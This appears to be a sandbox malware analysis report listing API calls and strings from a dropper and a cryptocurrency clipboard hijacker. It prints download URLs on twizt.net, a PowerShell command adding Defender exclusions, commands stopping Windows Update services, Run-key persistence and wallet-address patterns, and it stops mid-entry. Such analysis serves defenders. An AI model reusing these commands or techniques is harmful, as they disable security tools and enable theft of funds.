Snapshot File: hcaresult_3_2_840000_http185.jbxd

Similarity

API ID: Internet$CloseHandleOpenSleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/peinstall.php
API String ID: 256278798-2653881570
Opcode ID: d9853abd02d081468b217ff5f81a86c15437e3ee18c058e1dd9cc73a38945103
Instruction ID: 384839adb80fa90e536a4cd78c3ab972f8563ad416fed8a1f44da8fa7660d939
Opcode Fuzzy Hash: d9853abd02d081468b217ff5f81a86c15437e3ee18c058e1dd9cc73a38945103
Instruction Fuzzy Hash: E5F0393578672837E23227609C8AF6E6798EB87F95F600111B701AA2C08A99A800C56D

Function 00841350 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00841368
wsprintfW.USER32 ref: 00841380
PathFileExistsW.KERNELBASE(00000000), ref: 0084138D
CreateFileW.KERNELBASE(40000000,40000000,00000000,00000000,00000001,00000002,00000000), ref: 008413B4
CloseHandle.KERNELBASE(00000000), ref: 008413C0

Strings

%s\33573537.jpg, xrefs: 0084137A
%temp%, xrefs: 00841363

Memory Dump Source

Source File: 00000003.00000002.1964569084.0000000000841000.00000020.00000001.01000000.00000006.sdmp, Offset: 00840000, based on PE: true

Associated: 00000003.00000002.1964522748.0000000000840000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964599121.0000000000842000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964631353.0000000000844000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_840000_http185.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\33573537.jpg$%temp%
API String ID: 750032643-2829634191
Opcode ID: a6c61c59d34c97005c31d88ce497cb04dd1dc6c04d1f670e647041d06c209687
Instruction ID: 01e58008db9417814e5d0eee1c421c2dde168f1d81f0384bc4605d187e87f4af
Opcode Fuzzy Hash: a6c61c59d34c97005c31d88ce497cb04dd1dc6c04d1f670e647041d06c209687
Instruction Fuzzy Hash: 39F090B8548704A7E6309F60EC4EFE637A8BB41B04FC04A18B665D12E1E7B9919CC665

Function 00841000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 0084100C
CreateProcessW.KERNELBASE ref: 0084105C
Sleep.KERNELBASE(000003E8), ref: 0084106C

Strings

D, xrefs: 0084104C

Memory Dump Source

Source File: 00000003.00000002.1964569084.0000000000841000.00000020.00000001.01000000.00000006.sdmp, Offset: 00840000, based on PE: true

Associated: 00000003.00000002.1964522748.0000000000840000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964599121.0000000000842000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964631353.0000000000844000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_840000_http185.jbxd

Similarity

API ID: CreateProcessSleepmemset
String ID: D
API String ID: 4129363112-2746444292
Opcode ID: 80d0eb1c1ea8c0cd7a6514a5d6455e936db44e19d716070bdab28d6ea5b93e5a
Instruction ID: 1e4ef062c99a56507f91f0f775a2962ce0621c67d48571822d75b0f446bf63b8
Opcode Fuzzy Hash: 80d0eb1c1ea8c0cd7a6514a5d6455e936db44e19d716070bdab28d6ea5b93e5a
Instruction Fuzzy Hash: 1A016DB0A88700AAE710DF20CC46B0B77E4FB84B00F50491DF249DA2D0E7B999088B57

Function 008413D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 008413D5

Part of subcall function 00841080: GetTickCount.KERNEL32 ref: 00841089
Part of subcall function 00841080: srand.MSVCR90 ref: 00841090
Part of subcall function 00841080: ExpandEnvironmentStringsW.KERNEL32 ref: 008410AF
Part of subcall function 00841080: rand.MSVCR90 ref: 008410B5
Part of subcall function 00841080: rand.MSVCR90 ref: 008410C9
Part of subcall function 00841080: wsprintfW.USER32 ref: 008410F5
Part of subcall function 00841080: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00841107
Part of subcall function 00841080: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0084112D
Part of subcall function 00841080: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 00841151
Part of subcall function 00841080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 0084117B
Part of subcall function 00841080: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 008411A0
Part of subcall function 00841080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 008411B5

Part of subcall function 00841350: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00841368
Part of subcall function 00841350: wsprintfW.USER32 ref: 00841380
Part of subcall function 00841350: PathFileExistsW.KERNELBASE(00000000), ref: 0084138D

Part of subcall function 008412F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00841300
Part of subcall function 008412F0: InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00841327
Part of subcall function 008412F0: Sleep.KERNELBASE(000003E8), ref: 00841334
Part of subcall function 008412F0: InternetCloseHandle.WININET(00000000), ref: 00841337
Part of subcall function 008412F0: Sleep.KERNELBASE(000003E8), ref: 0084133F
Part of subcall function 008412F0: InternetCloseHandle.WININET(00000000), ref: 00841342

Strings

http://twizt.net/newtpp.exe, xrefs: 008413DB

Memory Dump Source

Source File: 00000003.00000002.1964569084.0000000000841000.00000020.00000001.01000000.00000006.sdmp, Offset: 00840000, based on PE: true

Associated: 00000003.00000002.1964522748.0000000000840000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964599121.0000000000842000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964631353.0000000000844000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_840000_http185.jbxd

Similarity

API ID: Internet$File$Open$Sleep$CloseEnvironmentExpandHandleReadStringsrandwsprintf$CountCreateExistsPathTickWritesrand
String ID: http://twizt.net/newtpp.exe
API String ID: 3094868945-3495472230
Opcode ID: 0a876761e0b03566fc7ffe86f542fb7d1776d505e4fd67f14b975bdc49cc47b9
Instruction ID: 21166c00111f0e49660bd33fe96f747b399a6642fc2d57a93fdf777f4b15ba06
Opcode Fuzzy Hash: 0a876761e0b03566fc7ffe86f542fb7d1776d505e4fd67f14b975bdc49cc47b9
Instruction Fuzzy Hash: 97C08C7191810C458E007FB8190F60A21A0FE04B89F080412F605D0F87EA8A94C4E133

Analysis Process: http185.215.113.66newtpp.exe.exePID: 5660, Parent PID: 6936COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.7%
Total number of Nodes:	1501
Total number of Limit Nodes:	8

Executed Functions

Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
strcmp.NTDLL ref: 0040F1D2

Strings

UKR, xrefs: 0040F1C9

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA

Function 00407940 Relevance: 282.5, APIs: 103, Strings: 58, Instructions: 749
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 0040794E
CreateMutexA.KERNELBASE(00000000,00000000,l9ll8dd6x), ref: 0040795D
GetLastError.KERNEL32 ref: 00407969
ExitProcess.KERNEL32 ref: 00407978
GetModuleFileNameW.KERNEL32(00000000,00419288,00000105), ref: 004079B2
PathFindFileNameW.SHLWAPI(00419288), ref: 004079BD
wsprintfW.USER32 ref: 004079DA
DeleteFileW.KERNELBASE(?), ref: 004079EA
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
wcscmp.NTDLL ref: 00407A13
ExitProcess.KERNEL32 ref: 00407A32

Strings

/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -, xrefs: 00407D40
AntiVirusDisableNotify, xrefs: 004082AA
cmd.exe, xrefs: 00407D60
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407AA9
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407CA4
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, xrefs: 00407F3D
FirewallOverride, xrefs: 00408117
SOFTWARE\Microsoft\Security Center\Svc, xrefs: 004081FE
SYSTEM\CurrentControlSet\Services\UsoSvc, xrefs: 00407D80
SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator, xrefs: 0040802D
open, xrefs: 00407D4A
FirewallDisableNotify, xrefs: 00408136
AutoUpdateOptions, xrefs: 0040807C
cmd.exe, xrefs: 00407D45
open, xrefs: 00407D65
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 00407F96
%temp%, xrefs: 00407C3F
AntiVirusOverride, xrefs: 0040828B
SYSTEM\CurrentControlSet\Services\wuauserv, xrefs: 00407E32
AlwaysAutoUpdate, xrefs: 00407FE1
OverrideNotice, xrefs: 00408000
%s:Zone.Identifier, xrefs: 004079CE
%userprofile%, xrefs: 004079FC
Start, xrefs: 00407E05
UpdatesOverride, xrefs: 004081B2
SYSTEM\CurrentControlSet\Services\BITS, xrefs: 00407EE4
PreventDownload, xrefs: 004080BA
UpdatesDisableNotify, xrefs: 004081D1
UpdatesDisableNotify, xrefs: 004082E8
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, xrefs: 00407D5B
%s\%s, xrefs: 00407A5B
Windows Settings, xrefs: 00407AE7, 00407BD9, 00407CE2
Start, xrefs: 00407EB7
FirewallDisableNotify, xrefs: 0040824D
%s\tbtcmds.dat, xrefs: 00408355
%s\tbtnds.dat, xrefs: 0040833B
Start, xrefs: 00407F10
Start, xrefs: 00407DAC
l9ll8dd6x, xrefs: 00407954
Start, xrefs: 00407E5E
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407B9B
DisableWindowsUpdate, xrefs: 0040805D
SOFTWARE\Microsoft\Security Center, xrefs: 004080E7
sysvplervcs.exe, xrefs: 00407A07, 00407A4F, 00407B41, 00407C4A
NoAutoUpdate, xrefs: 00407FC2
AntiSpywareOverride, xrefs: 00408155
AntiSpywareOverride, xrefs: 0040826C
%s\%s, xrefs: 00407C56
AntiVirusOverride, xrefs: 00408174
SYSTEM\CurrentControlSet\Services\DoSvc, xrefs: 00407E8B
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc, xrefs: 00407DD9
UpdatesOverride, xrefs: 004082C9
FirewallOverride, xrefs: 0040822E
AntiVirusDisableNotify, xrefs: 00408193
%s\%s, xrefs: 00407B4D
%windir%, xrefs: 00407A44
EnableWindowsUpdate, xrefs: 0040809B
DisableWindowsUpdate, xrefs: 00407F69

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$l9ll8dd6x$open$open$sysvplervcs.exe
API String ID: 4172876685-3747835529
Opcode ID: add7f2867d3facd946ede244a6e8cb351af2b2198803357798ad32e85e4d8119
Instruction ID: 3727754f30313162e09ea228bc4127773500fbdeb88fc750f5508899a1c71917
Opcode Fuzzy Hash: add7f2867d3facd946ede244a6e8cb351af2b2198803357798ad32e85e4d8119
Instruction Fuzzy Hash: E85261B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5F309B61D0D7F46AC4CB5D

Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040F40E
memset.NTDLL ref: 0040F41E
CreateProcessW.KERNELBASE(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
Sleep.KERNELBASE(000003E8), ref: 0040F467
ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
Sleep.KERNEL32(000003E8), ref: 0040F49C

Strings

open, xrefs: 0040F47B
, xrefs: 0040F491
D, xrefs: 0040F426

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

Non-executed Functions

Function 004068E0 Relevance: 105.4, APIs: 47, Strings: 13, Instructions: 407
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_chkstk.NTDLL(?,004070E0,?,?,?), ref: 004068E8
wsprintfW.USER32 ref: 0040691F
wsprintfW.USER32 ref: 0040693F
wsprintfW.USER32 ref: 0040695F
wsprintfW.USER32 ref: 0040697F
wsprintfW.USER32 ref: 00406998
wsprintfW.USER32 ref: 004069B8
PathFileExistsW.SHLWAPI(?), ref: 004069C8
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A01
DeleteFileW.KERNEL32(?), ref: 00406A0E
PathFileExistsW.SHLWAPI(?), ref: 00406A1B
PathFileExistsW.SHLWAPI(?), ref: 00406A30
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A46
DeleteFileW.KERNEL32(?), ref: 00406A53
PathFileExistsW.SHLWAPI(?), ref: 00406A60
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406A73

Strings

shell32.dll, xrefs: 00406C38
%s\%s\rvldrv.exe, xrefs: 004069AC
%s\%s\%s, xrefs: 00406EE7
%s\%s, xrefs: 00406EC0
%s\%s, xrefs: 00406E4D
shell32.dll, xrefs: 00406BFC
%s\%s, xrefs: 00406973
%s\*, xrefs: 0040698C
%s\%s, xrefs: 00406933
%s.lnk, xrefs: 00406913
shell32.dll, xrefs: 00406C16
shell32.dll, xrefs: 00406C52
%s\%s\rvlcfg.exe, xrefs: 00406953

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
API String ID: 495142193-638321828
Opcode ID: 6a08ebe59cd9da9df64074c0464e1883b01c1b22f3d2043970c0b6da084f5937
Instruction ID: 59b820cdb8f29ccb0d54d7a2d73e29f7da1b6e1a218f7b983ff8b9a861adfc28
Opcode Fuzzy Hash: 6a08ebe59cd9da9df64074c0464e1883b01c1b22f3d2043970c0b6da084f5937
Instruction Fuzzy Hash: C30271B5900218ABDB20DB60DC84FEA7778BF44705F0485E9F50AA6190DBB89BD4CF69

Function 00404970 Relevance: 71.0, APIs: 24, Strings: 16, Instructions: 991clipboardstringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 00404994
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404DA1
StrStrW.SHLWAPI(00000000,cosmos), ref: 00404DCC
StrStrW.SHLWAPI(00000000,addr), ref: 00404DF7
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404E92
StrStrW.SHLWAPI(00000000,ronin:), ref: 00404EA9
StrStrW.SHLWAPI(00000000,nano_), ref: 00404EC0
StrStrW.SHLWAPI(00000000,bnb), ref: 00405460
StrStrW.SHLWAPI(00000000,bc1p), ref: 0040547C
StrStrW.SHLWAPI(00000000,bc1q), ref: 00405498
StrStrW.SHLWAPI(00000000,ronin:), ref: 004054BB
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 004054D5
StrStrW.SHLWAPI(00000000,cosmos), ref: 004054EF
StrStrW.SHLWAPI(00000000,addr), ref: 00405509
StrStrW.SHLWAPI(00000000,nano_), ref: 00405523
lstrlenA.KERNEL32(00000000), ref: 004055F8
GlobalAlloc.KERNEL32(00002002,-00000001), ref: 00405613
GlobalLock.KERNEL32(00000000), ref: 00405626
memcpy.NTDLL(00000000,00000000,-00000001), ref: 00405644
GlobalUnlock.KERNEL32(00000000), ref: 00405650
OpenClipboard.USER32(00000000), ref: 00405658
EmptyClipboard.USER32 ref: 00405662
SetClipboardData.USER32(00000001,00000000), ref: 0040566E
CloseClipboard.USER32 ref: 00405674

Strings

ronin:, xrefs: 004054B2
hA, xrefs: 004054AB
bc1p, xrefs: 00405473
cosmos, xrefs: 004054E6
bitcoincash:, xrefs: 00404D98
nano_, xrefs: 0040551A
ronin:, xrefs: 00404EA0
bitcoincash:, xrefs: 004054CC
bitcoincash:, xrefs: 00404E89
addr, xrefs: 00404DEE
addr, xrefs: 00405500
bnb, xrefs: 00405457
8, xrefs: 0040554E
cosmos, xrefs: 00404DC3
bc1q, xrefs: 0040548F
nano_, xrefs: 00404EB7

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
API String ID: 2017104846-250561147
Opcode ID: 1bd55decf1849d2b04fc94afbc972d319511c495283510d86a994dbea99258db
Instruction ID: bd0f3124df6efdd80db42baf176abd9d691550f1c3a3f3a6796f605c168922c0
Opcode Fuzzy Hash: 1bd55decf1849d2b04fc94afbc972d319511c495283510d86a994dbea99258db
Instruction Fuzzy Hash: 68924BB0A04218EACF588F41C0945BE7BB2EF82755F60C16BE8456F294D77C8EC1DB99

Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004059BC
SetClipboardViewer.USER32(?), ref: 00405A08
SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
OpenClipboard.USER32(00000000), ref: 00405AB7
GetClipboardData.USER32(00000000), ref: 00405AC9
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
ChangeClipboardChain.USER32(?,?), ref: 00405BDE
DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
wsprintfW.USER32 ref: 004067C5
FindFirstFileW.KERNEL32(?,?), ref: 004067DC
lstrcmpW.KERNEL32(?,00411368), ref: 00406801
lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
wsprintfW.USER32 ref: 0040683A
wsprintfW.USER32 ref: 0040685A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
FindClose.KERNEL32(000000FF), ref: 004068BF
RemoveDirectoryW.KERNEL32(?), ref: 004068C9

Strings

%s\%s, xrefs: 0040684E
%s\*, xrefs: 004067B9
%s\%s, xrefs: 0040682E

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98

Function 00406F70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00406F7E
GetModuleFileNameW.KERNEL32(00000000,00418E70,00000104), ref: 00406F90

Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232

ExitThread.KERNEL32 ref: 004070FA

Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E

Sleep.KERNEL32(000007D0), ref: 004070ED

Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
wsprintfW.USER32 ref: 00407072
wsprintfW.USER32 ref: 00407092
wsprintfW.USER32 ref: 004070B5

Strings

%s%s, xrefs: 004070A9
(%dGB), xrefs: 00407066
Unnamed volume, xrefs: 00407086

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

